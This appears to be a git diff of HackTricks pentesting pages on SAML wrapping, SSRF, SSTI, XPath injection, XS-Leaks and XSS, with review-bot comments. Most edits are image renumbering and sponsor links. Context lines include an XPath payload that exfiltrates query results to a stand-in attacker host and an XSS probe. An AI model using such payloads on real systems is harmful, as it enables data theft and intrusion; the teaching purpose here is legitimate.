+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
diff --git a/pentesting-web/registration-vulnerabilities.md b/pentesting-web/registration-vulnerabilities.md
index e50662755..73b89ccd5 100644
--- a/pentesting-web/registration-vulnerabilities.md
+++ b/pentesting-web/registration-vulnerabilities.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
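Review bot: On the "Join the" bullet the change escapes the underscore inside the link destination (`https://twitter.com/hacktricks\_live`), while the same bullet in another file of this patch keeps `https://twitter.com/hacktricks_live` unescaped and the Trickest hunks remove escapes from their URLs. The escape is unnecessary in a link destination, so leave the URL as it was for consistency. The link text also still reads `@carlospolopm` while pointing at `hacktricks_live`, where the other file uses `@hacktricks_live`; the same applies to the later hunk in this file that makes the identical change.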
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Registration Takeover
@@ -205,10 +205,9 @@ JSON Web Token might be used to authenticate an user.
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
-
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -218,7 +217,6 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
-
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
@@ -228,7 +226,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md
index 6f784be5c..9b1a85c7b 100644
--- a/pentesting-web/reset-password.md
+++ b/pentesting-web/reset-password.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -135,7 +135,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
* [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md
index 44d0da961..8f6442835 100644
--- a/pentesting-web/saml-attacks/README.md
+++ b/pentesting-web/saml-attacks/README.md
@@ -56,11 +56,11 @@ First child after round-trip: Z
This is how REXML saw the original XML document from the program above:
-![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (998).png>)
+![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (1001).png>)
And this is how it saw it after a round of parsing and serialization:
-![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (442).png>)
+![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../.gitbook/assets/image (445).png>)
For more information about the vulnerability and how to abuse it:
@@ -78,56 +78,56 @@ The following attacks ara based on [**this blog post**](https://epi052.gitlab.io
* **Strategy**: A new root element containing the signature is added.
* **Implication**: The validator may get confused between the legitimate "Response -> Assertion -> Subject" and the attacker's "evil new Response -> Assertion -> Subject", leading to data integrity issues.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../.gitbook/assets/image (503).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../.gitbook/assets/image (506).png>)
### XSW #2
* **Difference from XSW #1**: Utilizes a detached signature instead of an enveloping signature.
* **Implication**: The "evil" structure, similar to XSW #1, aims to deceive the business logic post integrity check.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../.gitbook/assets/image (462).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../.gitbook/assets/image (466).png>)
### XSW #3
* **Strategy**: An evil Assertion is crafted at the same hierarchical level as the original assertion.
* **Implication**: Intends to confuse the business logic into using the malicious data.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../.gitbook/assets/image (117).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../.gitbook/assets/image (120).png>)
### XSW #4
* **Difference from XSW #3**: The original Assertion becomes a child of the duplicated (evil) Assertion.
* **Implication**: Similar to XSW #3 but alters the XML structure more aggressively.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../.gitbook/assets/image (548).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../.gitbook/assets/image (551).png>)
### XSW #5
* **Unique Aspect**: Neither the Signature nor the original Assertion adhere to standard configurations (enveloped/enveloping/detached).
* **Implication**: The copied Assertion envelopes the Signature, modifying the expected document structure.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../.gitbook/assets/image (1027).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../.gitbook/assets/image (1030).png>)
### XSW #6
* **Strategy**: Similar location insertion as XSW #4 and #5, but with a twist.
* **Implication**: The copied Assertion envelopes the Signature, which then envelopes the original Assertion, creating a nested deceptive structure.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../.gitbook/assets/image (166).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../.gitbook/assets/image (169).png>)
### XSW #7
* **Strategy**: An Extensions element is inserted with the copied Assertion as a child.
* **Implication**: This exploits the less restrictive schema of the Extensions element to bypass schema validation countermeasures, especially in libraries like OpenSAML.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../.gitbook/assets/image (968).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../.gitbook/assets/image (971).png>)
### XSW #8
* **Difference from XSW #7**: Utilizes another less restrictive XML element for a variant of the attack.
* **Implication**: The original Assertion becomes a child of the less restrictive element, reversing the structure used in XSW #7.
-![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../.gitbook/assets/image (538).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../.gitbook/assets/image (541).png>)
### Tool
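Review bot: The XSW #2 reference moves by four (`image (462).png` to `image (466).png`) while every other image reference in this hunk moves by three (503 to 506, 117 to 120, 548 to 551, and so on), so please confirm that `image (466).png` really is the xsw-2 diagram named in its alt text. Nothing in the diff lets a reviewer check that a renumbered asset still holds the same picture; naming these files after the diagram they contain (the alt text already carries `xsw-1.svg` through `xsw-8.svg`) would stop unrelated asset shuffles from silently pairing an attack description with the wrong figure.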
@@ -209,7 +209,7 @@ Check also this talk: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.
The **XML Signature Exclusion** observes the behavior of SAML implementations when the Signature element is not present. If this element is missing, **signature validation may not occur**, making it vulnerable. It's possibel to test this by altering the contents that are usually verified by the signature.
-![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../.gitbook/assets/image (454).png>)
+![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../.gitbook/assets/image (457).png>)
### Tool
diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md
index 3380927a8..1807f3d1c 100644
--- a/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -106,7 +106,7 @@ SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md
index 3b2acd496..163204362 100644
--- a/pentesting-web/sql-injection/sqlmap/README.md
+++ b/pentesting-web/sql-injection/sqlmap/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
@@ -236,7 +236,7 @@ Remember that **you can create your own tamper in python** and it's very simple.
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
-
+
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md
index 93de45239..d923c6dad 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -1,12 +1,12 @@
# SSRF (Server Side Request Forgery)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
@@ -217,13 +217,13 @@ if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
## Misconfigured proxies to SSRF
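Review bot: The example server in the first context line of this hunk is started with `debug=True` while bound to `host="0.0.0.0"`. If this is a Flask app, as the `ssl_context='adhoc'` argument suggests, that combination puts the interactive debugger, which is intended for local development only, on every interface of whatever machine a reader runs the snippet on. The change does not touch that line, but since the page is being edited anyway, consider switching the example to `debug=False` and keeping the wide bind only because the redirect server has to be reachable.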
@@ -266,7 +266,7 @@ Connection: close
Vulnerable code:
-
+
It was discovered that It's possible to **start the path** of a request with character **`;`** which allows to use then **`@`** and inject a new host to access. Attack request:
@@ -420,10 +420,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index 5faea9baa..3c654ed83 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -93,7 +93,7 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
spoofed.burpcollaborator.net = 127.0.0.1
```
-![](<../../.gitbook/assets/image (773).png>)
+![](<../../.gitbook/assets/image (776).png>)
The **Burp extension** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implements IP formatting bypasses.
@@ -216,7 +216,7 @@ The _backslash-trick_ exploits a difference between the [WHATWG URL Standard](ht
### Other Confusions
-![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (597).png>)
+![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)
image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index 92d93ff57..a55ff4a0f 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
index 385986907..fc6b7a535 100644
--- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
+++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
@@ -7,14 +7,14 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -24,20 +24,20 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Bsic Info
Expression Language (EL) is integral in JavaEE for bridging the presentation layer (e.g., web pages) and application logic (e.g., managed beans), enabling their interaction. It's predominantly used in:
-- **JavaServer Faces (JSF)**: For binding UI components to backend data/actions.
-- **JavaServer Pages (JSP)**: For data access and manipulation within JSP pages.
-- **Contexts and Dependency Injection for Java EE (CDI)**: For facilitating web layer interaction with managed beans.
+* **JavaServer Faces (JSF)**: For binding UI components to backend data/actions.
+* **JavaServer Pages (JSP)**: For data access and manipulation within JSP pages.
+* **Contexts and Dependency Injection for Java EE (CDI)**: For facilitating web layer interaction with managed beans.
**Usage Contexts**:
-- **Spring Framework**: Applied in various modules like Security and Data.
-- **General Use**: Through SpEL API by developers in JVM-based languages like Java, Kotlin, and Scala.
+* **Spring Framework**: Applied in various modules like Security and Data.
+* **General Use**: Through SpEL API by developers in JVM-based languages like Java, Kotlin, and Scala.
EL's is present in JavaEE technologies, standalone environments, and recognizable through `.jsp` or `.jsf` file extensions, stack errors, and terms like "Servlet" in headers. However, its features and the use of certain characters can be version-dependent.
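Review bot: The heading `## Bsic Info` sits in the middle of the lines this hunk reformats and keeps its typo; change it to `## Basic Info` in the same pass, since any anchor generated from the heading inherits the misspelling. The closing context sentence ("EL's is present in JavaEE technologies, standalone environments, and recognizable through ...") has the same problem and should read "EL is present". The switch from `-` to `*` bullets and from `----` to `***` is consistent within the hunk and needs no change.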
@@ -98,7 +98,7 @@ Note how in the previous example the term `{5*5}` was **evaluated**.
## **CVE Based Tutorial**
-Check it in **this post: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
+Check it in **this post:** [**https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a**](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)
## Payloads
@@ -274,7 +274,7 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -291,7 +291,7 @@ You can check their website and try their engine for **free** at:
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/pentesting-web/unicode-injection/unicode-normalization.md b/pentesting-web/unicode-injection/unicode-normalization.md
index ccff4eaf6..f6fc462ca 100644
--- a/pentesting-web/unicode-injection/unicode-normalization.md
+++ b/pentesting-web/unicode-injection/unicode-normalization.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
**This is a summary of:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Check a look for further details (images taken form there).
@@ -73,7 +73,7 @@ Imagine a web page that is using the character `'` to create SQL queries with th
Then, a malicious user could insert a different Unicode character equivalent to `' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
-![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
+![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (702).png>)
**Some interesting Unicode characters**
@@ -131,7 +131,7 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md
index af7679dfa..9592dd522 100644
--- a/pentesting-web/xpath-injection.md
+++ b/pentesting-web/xpath-injection.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -317,7 +317,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
* [https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_(OTG-INPVAL-010)](https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_\(OTG-INPVAL-010\))
* [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath\_syntax.asp)
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/pentesting-web/xs-search/README.md b/pentesting-web/xs-search/README.md
index 49b2724ed..1e16fcef5 100644
--- a/pentesting-web/xs-search/README.md
+++ b/pentesting-web/xs-search/README.md
@@ -1,11 +1,11 @@
# XS-Search/XS-Leaks
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [****](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
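Review bot: The added `+Use [****](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search)` line has lost its link label: the old line had `[**Trickest**]` and the new one has `[****]`, so the sentence now reads "Use to easily build ..." with no readable link text. The other Trickest blocks changed in this file keep `[**Trickest**]`; restore the label here to match them.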
@@ -71,13 +71,13 @@ You can **access the tool in** [**https://xsinator.com/**](https://xsinator.com/
**Excluded XS-Leaks**: We had to exclude XS-Leaks that rely on **service workers** as they would interfere with other leaks in XSinator. Furthermore, we chose to **exclude XS-Leaks that rely on misconfiguration and bugs in a specific web application**. For example, CrossOrigin Resource Sharing (CORS) misconfigurations, postMessage leakage or Cross-Site Scripting. Additionally, we excluded timebased XS-Leaks since they often suffer from being slow, noisy and inaccurate.
{% endhint %}
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
## **Timing Based techniques**
@@ -222,12 +222,12 @@ You can perform the same attack with **`portal`** tags.
Applications frequently utilize [`postMessage` broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to communicate across different origins. However, this method can inadvertently expose **sensitive information** if the `targetOrigin` parameter is not properly specified, allowing any window to receive the messages. Furthermore, the mere act of receiving a message can act as an **oracle**; for instance, certain messages might only be sent to users who are logged in. Therefore, the presence or absence of these messages can reveal information about the user's state or identity, such as whether they are authenticated or not.
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
## Global Limits Techniques
@@ -814,7 +814,7 @@ Or could just **send some fetch to the pontentially cached page and measure the
* **Summary:** It's possible to find out if a response to a fetch request is a redirect
* **Code Example**:
-![](<../../.gitbook/assets/image (766).png>)
+![](<../../.gitbook/assets/image (769).png>)
### Fetch with AbortController
@@ -866,13 +866,13 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
* **Summary:** se [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) to measure the time it takes to perform a request using `window.open`. Other clocks could be used.
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
## With HTML or Re Injection
@@ -970,10 +970,10 @@ Other ways to support HackTricks:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
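Review bot: Only the `{% embed %}` line is updated in this hunk; the text link two lines above it is left as unchanged context and still points at the old, escaped URL (`utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks`). Every other Trickest block in this file has both the text link and the embed rewritten, so this footer ends up with two different tracking URLs for the same banner. Update the text link to the `utm_medium=text` form used in the earlier hunks.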
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index b8f49b4a4..1ad72fe44 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,6 +1,6 @@
# XSS (Cross Site Scripting)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -106,13 +106,13 @@ Several web pages have endpoints that **accept as parameter the name of the func
A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like:
-![](<../../.gitbook/assets/image (708).png>)
+![](<../../.gitbook/assets/image (711).png>)
In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**).
However, even with that limitation it's still possible to perform some actions. This is because you can use that valid chars to **access any element in the DOM**:
